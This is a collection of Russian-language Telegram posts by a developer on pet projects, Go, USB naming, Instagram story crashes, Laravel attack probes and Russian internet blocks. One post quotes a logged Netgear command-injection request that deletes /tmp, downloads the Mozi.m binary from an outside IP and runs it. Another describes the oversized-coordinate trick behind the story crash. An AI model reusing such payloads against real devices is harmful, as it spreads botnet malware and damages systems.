К слову о пет-проджектах, почему вообще они нужны

Если кто не знал, пет-проджекты (pet-projects, проекты-питомцы) - это личные проекты, которые ты сам по себе а лишь, вкладывая в них душу и свободное время

Так вот, почему считаю такие проекты важными:

Во-первых, работая в компании, на фрилансе, да и везде, где важна производительность и надо сделать что-либо как можно быстрее, ты останешься в неких рамках, "привязанный" к уже знакомым технологиям, языкам, фреймворка и библиотекам. Ведь всем выгоднее использовать уже знакомые, устоявшиеся и "безопасные" технологии, с которыми знакомы коллеги, и проекты не придется переделывать с нуля, в случае чего;

Во-вторых, подобные проекты всегда пишутся "с душой", т.е. используя самые лучшие практики, паттерны и советы. Или наоборот, не используя паттерны, которые уже устоялись в команде и ты не видишь в них смысла (да, бывает и такое);

В-третьих, если ты не работаешь на фрилансе над разномастными проектами, а сидишь в хорошей компании с инхаус-разработкой (как я 😏), скорее всего это будет работа над чем-то одним. А пет-проджекты помогают "развеиться";

В-четвертых, это хорошее портфолио, даже небольшой багаж рабочих проектов (а не все проекты доходят до этой точки) будет отличным бонусом к резюме;

Ну и конечно последний пункт - это шанс создать действительно что-то интересное и успешное. К сожалению, не все проекты доходят до этого, ну уж что поделать

Естественно, у пет-проектов есть не только плюсы, но и минусы, но об этом как-нибудь в другой раз

#pet_projects

Классная статья от Медузы, о том как работает их внутренняя CMS. Со всеми техническими деталями, и так далее. Обещают продолжение и больше технических деталей позже.

Вкратце: Ruby on Rails + React, и немного костылей

Еще бы в open source выложили, вообще было бы класно

Недавно попробовал для себя Golang — сделал микросервис для своего пет-проджекта. Аааа, почему все ЯП ещё не такие?!

Из того, что запомнилось:
1. Структуры (struct). Как же не хватало их в PHP, т.к. классы зачастую излишни. Но зато классов в Голанге нет;
2. Читабельность. Язык в первую очередь сделан для удобного чтения, а не быстрого написания. Поэтому: никаких «сложных для глаза» тернарных операторов и ему подобных конструкций (foo ? bar : baz, ??= и их друзья);
3. Лаконично прописанная область видимости методов/функций (private/public). Начинается с Большой Буквы - public, начинается с маленькой буквы — приватный;
4. Указатели/ссылки — для кого-то - это *боль, но при правильном использовании — офигенная &вещь;
5. Горутины. Нормального юз-кейса для себя не нашел, но поигрался. Некий аналог Тредов (Threads), но намного более легковесный. Этот пункт вообще достоин отдельной статьи, ибо горутины (Go + Coroutines, сопрограммы) это очень мощная и очень объемная фигня

Короче, всем веберастам рекомендуется к ознакомлению. А кто знает хорошие ресурсы по Го — присылайте, буду рад почитать и узнать о нем ещё.

#яп #golang

Вообще, не понимаю, как во время, когда на рекламу и маркетинг тратят огромные средства, у Яндекс Еды, Кухни на районе и других сервисов доставки остается такая отвратительная реклама. Речь конечно же, про этот отвратительный формат "всем привет, нашла крутой сервис доставки, посмотрите какое говно я заказала".

Совершенно непонятно, по какому принципу они решили, что это удачный формат, на что они надеятся? Что потенциальный покупатель настолько тупой, что может перепутать Ютуб с Инстаграмом и такой "О, а кто-то из моих подписок там закал, закажу-ка я тоже!", и пофиг что там огромная плашка "РЕКЛАМА" и вообще он ни на кого не подписан. Или что кто-то подумает, что это очередной блогер решил "от чистого сердца рассказать про очень удобный сервис" в очередной раз?

В общем, отвратительный формат рекламы, только отталкивает. А самое обидное, что я каким-то образом попал в настройки таргетинга этого тупого формата.

Короче, про Clubhouse. Слышали же про него, да?

Если нет, то вкратце: это такая "илитная" голосовая соцсеть, вход в которую только по инвайтам (которые, конечно же, у всех есть). Там всякие умники проводят аудиоконференции в "комнатах" - некий аналог TED Talks, адаптированный под онлайн-коронореалии. Последний взлет кстати, произошел с широкого плеча Илона Маска

Так вот, мое #мнение на этот счет: я вижу два варианта развития событий:
1. Помните Nimses? Тоже была "новая инновационная соцсеть", которая поднялась на хайпе, и на нём же и погорела. А сейчас больше похожа на ходячий труп. Примерно тоже случится и с Клабхаузом - забвение. Это пессимистичный вариант
2. Второй вариант - более оптимистичный. Инвайтов, конечно же, больше не будет, а сама площадка будет новым Twitch для умненьких, аудиоконференции станут видео-, реклама появится.

🎮 А теперь поговорим про более приземленные вещи — про гейминг. Все любят поиграть время от времени, а покупать консоли, а уж тем более видеокарты (спасибо чертовым майнерам, чтоб их) не очень-то и выгодно. Обсудим облачный гейминг в целом, Geforce Now и Playkey

https://telegra.ph/Oblachnyj-gejming-02-16

❓ Куда делось место на новой флешке?

Итак, покупаешь флешку в магазине, скажем, на 16 ГБ, вставляешь в компьютер, и, проводник показывает свободные 15,4 ГБ. Или покупаешь жесткий диск на 10 ТБ, а свободных почему-то всего 9 ТБ. Куда подевалось свободной пространство - вопрос. Давайте разбираться!

Все мы помним, что в 1 килобайте 1024 байт, в одном мегабайте 1024 килобайт, и так далее. Но вот только это — неправда. Все знакомые нам приставки кило-, мега-, гига- и так далее используются для перемножения на 1000. А это значит, что в килобайте на самом деле 1000 байт.

А для кратности 1024 существуют свои "двоичные" приставки — киби-, меби-, гиби- и теби- соответственно. И уже в них в одном мебибайте наконец-то 1024 кибибайт. Да, звучит не очень. Да, непривычно. Но зато правильно.

Так вот, к делу о пропавшем месте на флешках. Недостающий объем — это не китайцы ошибились, и не магазин пытается вас обмануть. Маркетологи и производители считают объем памяти в десятичных приставках правильным, с научной точки зрения, образом - умноженем на 1000. Но на более "бытовом" уровне, в том числе в проводнике, объем хранилища с десятичными приставками рассчитывается уже при помощи 1024. И таким образом растет и погрешность - на одних только килобайтах разница в объеме составляет 97%, а на терабайтах все 90% (1000 / 1024 = ~0.97, а дальше возводим в нужную степень)

Также не стоит забывать и про сами файловые системы (NTFS/FAT32/ext4). Каждая ФС резервирует небольшое пространство на носители для собственных нужд — структуру ФС, метаданные, журналы, атрибуты и другое.

Надеюсь теперь ни у кого не будет возникать вопросов о нехватке места при покупке новых флешек, жестких дисков, SSD или любых других носителей. А нам остается лишь верить, что когда-нибудь мы научимся правильно использовать нужные обозначения для объемов памяти.

Ну а еще, это один из редких случаев, когда маркетологи оказались правы, а технари — нет ;)

🪐 Прямо сейчас, на скорости 20000 км/ч марсоход Perseverance готовится приземлиться на Марс, и уже через 20 минут начнет непосредственно посадку. А на сайте NASA можно посмотреть 3D-визуализация в реальном времени, и также есть прямая трансляция от NASA

Вообще, хотелось бы когда-нибудь увидеть исходники ПО марсохода - столько систем, столько модулей, а одна ошибка может стоить миллиарды. Вы только представьте, этот марсоход даже сам выбирает место посадки, не говоря о контроле всей остальной посадки! Ведь задержка, между происходящем на Марсе и тем, когда мы получим данные - целых 11 минут никакого ручного управления нет. Вот это называется ответственность

Ура! Марсоход успешно приземлился! Скоро в NASA должны получить первые изображения, а после этого нас ждут несколько месяцев тестов и калибровок, прежде чем марсоход приступит к своей работе.

Только представьте: посадка длится всего 7 минут, а задержка между Землей и Марсом - 11 минут. Подумайте: марсоход, на другой планете уже 4 минуты как приземлился и что-то делает, а мы об этоб даже еще не знаем!

Н-да, я немного пропал, меня затянула злостная игровая пучина Блэк Дезерт, но вчера рандом сломал мне весь шмот, и я rage-quit-нул (серьезно, а есть ли этому слову аналог на русском?). Пойду займусь чем-нибудь полезным

Голосов, конечно, маловато, на да что ж 😅

На самом деле все они работают на скорости до 10 Гбит/с и разницы в максимальной скорости нет, но это не всё, так что приготовьтесь к перелому мозга. 🧠

Начнем с того, что, хотя скорость у данных стандартов одинаковая, все же USB 3.2 Gen 1x2 USB 3.2 Gen 2x1 немного отличаются, а именно количеством потоков данных (полудуплекс и полный дуплекс). USB 3.2 Gen 1x2 работает на двух потоках, а USB 3.2 Gen 2x1, соответственно в один. А это значит, что есть USB 3.2 Gen 1x1 и USB 3.2 Gen 2x2, где максимальная скорость, согласно множителю, 5 Гб и 20 Гбит в секунду соответственно. Но и это не все.

Знаете чем отличается USB 3.0 от USB 3.1 Gen 1? А снова ничем! на самом деле USB 3.0 переименовали в USB 3.1 Gen 1, и самого простого USB 3.0 больше не существует, и производители обязаны называть его USB 3.1 Gen 1. А, нет, не обязаны, ведь потом его снова переменовали в USB 3.2 Gen 1. Прослеживаете цепочку? USB 3.0 → USB 3.1 Gen 1 → USB 3.1 Gen 1, и все это разные названия одного и того же.

Еще не забыли, что сверху я написал про полу-дуплекс и полный дуплекс? Так вот, используя USB 3.2 Gen 1x2, скажем, при копировании данных с флешки, вы никогда не достигните скорости 10 Гбит/сек. Почему? Потому что данная скорость - это теоритический максимум при работе в полный дуплекс, а значит, при передачи информации в одну скорость делить нужно на два, и если вы копируете данные с флешки к себе на диск, то максимальная скорость будет всего 5 Гбит/с. И рекламируют это как 10 Гбит. А вот USB 3.2 Gen 2x1 в свою очередь уже может обеспечить одностороннюю передачу на скорости 10 Гбит/с. И не стоит забывать, что это - лишь максимум и средняя скорость будет намнооого ниже

С приходом USB 4.0 вроде как обещали все исправить, вот только вместо USB 4.0 вышел USB4 и называть по-другому его, вроде как, нельзя. Да и исправить не исправили, а сделали только хуже, причем намного. Нам не только оставили все эти приставки и множители (Gen, x1, x2), но еще и не выпустили USB4 Gen 1. Да, все верно, уже есть USB4 Gen 2 и Gen 3 c разными множителями (x1 и x2), а вот USB4 Gen 1 нет вообще ни в каком варианте. Видимо начинать со второго поколения сразу - это нормально 🤷‍♂️

А еще, как думаете, отличается вообще хотя бы какими-то характеристиками USB4 Gen 2×1 от USB 3.2 Gen 2×1 и USB4 Gen 2×2 от USB 3.2 Gen 2×2. Конечно же, нет 🤦‍♂️

Вроде бы, USB-IF (USB Implementers Forum, именно они занимаются разработкой стандартов USB) - это некоммерческая организация, на уровне всяких IEEE, IEC и ISO, но даже старые названия стандартов Wi-Fi (802.11) с их многообразием букв имели хотя бы какую-то логику, но здесь ее совершенно нет. Как будто-бы они пытаются вместе с производителями продать потребителям существующие технологии еще раз, потому что нового ничего нет (да и не нужно, большинству людей 5 Гбит хватит в повседневной жизни), просто меняя названия в надежде, что "прокатит"

А еще и Intel туда же - у нового Thunderbolt 4, ровна такая же скорость, что и у Thunderbolt 3 - 40 Гбит/с (кстати как и у USB4 Gen 3×2)

В общем, знайте, что такая обычная и повседневная вещь, как USB скрывает в себе такое количество неадекватности

В рубрике #слоуновости сегодня Neuralink. Видели же, что стартап Илона Маска Neuralink показал обезьяну, играющую в видеоигры «силой мысли»?

Сначала макака Пейджер играла в играла в «Понг» с помощью джойстика, а имплант записывал данный нейронной активности, а после данные сопоставлялись с фактическими движениями рук, полученных с джойстика. А когда данных стало достаточно - джойстик отключили и управление игрой перешло в руки алгоритма, который на основе нейронной активности двигательной коры мозга прогнозировал движения рук, а соответственно и джойстика. Подробнее про это можно узнать в оригинальном видео от Neuralink, т.к. я хочу поговорить немного о другом.

И начнем, пожалуй, с опроса: вы бы согласились имплантировать себе подобный чип, без острой необходимости, а просто ради развлечения или простого интереса?

Что я имею в виду под этими оговорками про необходимость? Как описывается в оригинальном видео, текущая цель проекта — обеспечить возможность взаимодействия с машинами людям, с ограниченными возможностями (паралич и прочее).

Но, естественно, рано или поздно, подобной сферой применения это не ограничится: так или иначе подобные импланты/чипы начнут использовать не только в сфере науки и медицины, но и в сфере развлечений, как это уже много раз бывало.

Так вот, согласились, и даже хотели бы вы на подобное применение данной технологии на себе? Естественно, с учетом развития данной технологии в ближайшее время, как с функциональной точки зрения, так и сточки зрения безопасности

​​В последнее время набирает популярность Инстаграм-аккаунт https://instagram.com/pgtalal, который, внимание, может доставить неприятности другим пользователям соцсети, заставив их устройства полностью зависнуть, да так, что придется ждать, пока сядет аккумулятор, т.к. не будут работать даже кнопки питания, и принудительно выключить устройство не получится. Так что, не рекомендую открывать этот профиль 🙃

Данная проблема касается больше устройств от Apple, и для того, чтобы попасться на удочку, нужно открыть истории (сториз, называйте как хотите), и устройство сразу зависает. А на Android-телефонах ситуация везде разная: на некоторых устройствах, все работает нормально, только немного подвисает при открытии, на некоторых устройствах вылетает приложение, а на остальныэ вылетает вообще весь интерфейс, но перезагрузить телефон все ещё можно.

Так вот, как это работает: истории — это не просто картинка или видео, это достаточно сложная штука с кучей интерактивных элементов (всякие наклейки и т.д.) и накладываются они послойно, т.е. не модифицируя оригинальное изображение, фон и рендерятся на клиенте. Именно на это и нацелена атака: дело в том, что размеры и координаты этих наклеек указаны в относительных единицах к размеру всего фото/видео (0-1, где 0 - это верх, 0.5 - середина, а 1 - низ, пример есть на первом фото) и после умножает эти значения на фактические размеры устройства пользователя (напр. 1920х1080 и координаты 0.7х0.5 дадут результат 1344х540)

А наша история-злоумышленник использует это свойство по-своему, подменив значения координат на просто астрономически огромные значения: 907970275584550430. Думаю, многие не знают даже как назвать подобные разряды чисел, а теперь представьте, что произойдет, если попытаться умножить их на другие числа, размеры самого устройства, и именно из-за этого и происходят зависания. Т.к. это float, не думаю, что ошибка из-за превышения 64 бит, но все равно странно

Вообще очень интересно, как в очередной раз, устройства от Apple показывают очень странное поведение, как, например, в прошлых т.н. "СМС смерти", или при переводе времени в 0 epoch

А ещё, буквально около часа, в аккаунте была закреплена история, которая полностью блокировала возможность смотреть вообще все другие истории, после просмотра этой "взломанной", и помогало только полное удаление приложения, но ее почему-то удалили 🤷‍♂️

❓ Как думаете, из-за чего устройства на iOS полностью зависают, без возможности даже перезагрузки? ⬇️

В январе, в одном из стандартных пакетов для Laravel (самый популярный PHP-фреймворк), была обнаружена уязвимость CVE-2021-3129. Тогда я не обратил на это внимания, да и никто из сообщества тоже, так как все знали, что данная уязвимость находится в пакете, который устанавливается только на локальном или дев-окружении, и нужно быть полным дурачком, чтобы оставить такой дебаг на продакшене. 🤦‍♂️

Но вчера вышла статья об этой уязвимости на Хакере, где мало того, что в типичной для них манере подали это как святой грааль взлома для всех Laravel-проектов, забыв упомянуть что на продакшене это так просто не сработает, но и в принципе подогрели всеобщий интерес. 🤬

И вот сегодня, на один из пет-проджектов в 6 утра полетели запросы на /_ignition/execute-solution, несколько сотен таких, которые сами понимаете что пытаются сделать.

Самое интересное, что сервер доступен только по IP-адресу, и я только локально прописал у себя в DNS нужный записи. Например, что бы с помощью того же curl до него достучаться извне, нужно отдельно прописать резолвы подобным образом: curl -v example.com --resolve 'example.com:80:10.10.10.10' --resolve 'example.com:443:10.10.10.10'. И каким образом те "потенциальные злоумышленники" смогли получить всю эту конфигурацию — вообще загадка.

Но так как вся эта конфигурация уже, так сказать, вышла в паблик, я прокинул все это дело через Cloudflare уже в публичный DNS, и буквально сразу же полетели запросы, то GET /.env, то GET /src и GET /config/database.php, и даже несколько непонятных и вообще нацеленных на Netgear: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://113.47.183.242:20303/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 (самое смешное, что вообще через HTTP/1.0). А это только те запросы, которые долетели до сервера, и непонятно сколько из них было заблокировано Cloudflare-ом

Иногда впечатляет, какой огромный набор автоматизаций и скрапперов у всех этих блек-хэтов, ведь мало того, что все эти "атаки" полетели сразу же, после настройки DNS, так некоторые сразу поняли, что это Laravel и начали пробовать специфичные атаки. Хотя я подчистил все стандартные заголовки (по типу X-Powered-By, который будто сделан, что бы помогать атакующим понять, с чем они работают) и другие элементы, выдающие мой стек 🤷‍♂️

- Роскомнадзор: "Visa и Mastercard, а ну быстро организовали обработку платежей в российских ЦОД, чтобы платежи нельзя было заблокировать"
- Visa и Mastercard: "Ок"
...
2022
...
- Visa и Mastercard: "*** все равно блокируют транзакции ***"
- Роскомнадзор: "а чё так можно было?"

Помойка РосКомПозораНадзора решила полностью заблокировать доступ к Facebook на территории России.

Что это означает и что нас ждет:
- Понятное дело, не будут работать ни сайт, ни мобильные приложения Facebook
- Возможны сбои в работе WhatsApp, Instagram, Oculus
- Некорректное поведение сайтов, использующих аналитику Facebook
- Маловероятно, но возможна ситуация, что Meta будет пытаться обойти блокировку, и начнутся новые ковровые блокировки, как в истории с блокировкой Telegram. Конечно, РКН перестали использовать подобный метод, но и в блокировку Facebook никто не верил, неизвестно что происходит у них в головах

Что делать:
- Обзавестись бесплатными VPN и средствами обхода блокировок, неизвестно что ещё нас ждет. Из списка Must-Have: Psiphon, NewNode VPN и Lantern VPN. Просто необходимо установить данные приложения, именно благодаря им в РБ и Казахстане в условиях шатдауна, сохранялась хоть какая-то сеть
- Задуматься о покупке VPN. Рекомендую выбрать любой из списка VPNLove, все сервисы предоставляют полную анонимность и поддерживают сервера в рабочем состоянии в любых условиях. Лично я пользуюсь @FCK_RKN_bot
- Установить на свои устройства Tor Browser, в режиме obfs4-мостов, или использовать @GetBridgesBot

Чувствую, это только начало волны новых крупных блокировок. Конечно, возможно что конторка даст заднюю, и отменит блокировку при условии исполнения всех требований Метой, но лично я в это не верю, это будет слишком крупной репутационной потерей для корпорации

Надо отдать должное Роскомнадзору, он сделал то, что многие года не могло сделать IT-сообщество, а именно научил всех пользоваться VPN и другими средствами обхода блокировок и анонимайзерами. Завтра в России не останется ни одного школьника, ни одного блогера и просто человека, который не знал бы как обходить блокировки.

Все потому что сегодня Роскомнадзор начал блокировку Instagram, причем по совершенно формальному поводу, якобы пользователями разрешат писать "угрозы" в сторону российского правительства. То есть задумайтесь, если раньше за подобное находили и репрессировали этих самых пользователей, то теперь виновата соцсеть.

Роскомнадзор довольно давно скалился в сторону Инстаграмма ещё с момента блокировки Facebook, но теперь они нашли этот самый, совершенно формальный, повод для блокировки

А на подходе и YouTube, который только что заявил, что будет блокировать каналы СМИ, спонсируемых российским правительством

А я напоминаю, что уже поздно задумываться о загрузке и покупке VPN, это надо делать уже сейчас. В моем предыдущем сообщении, рассказано, что и как делать для обхода любых блокировок: https://t.me/it_christ/121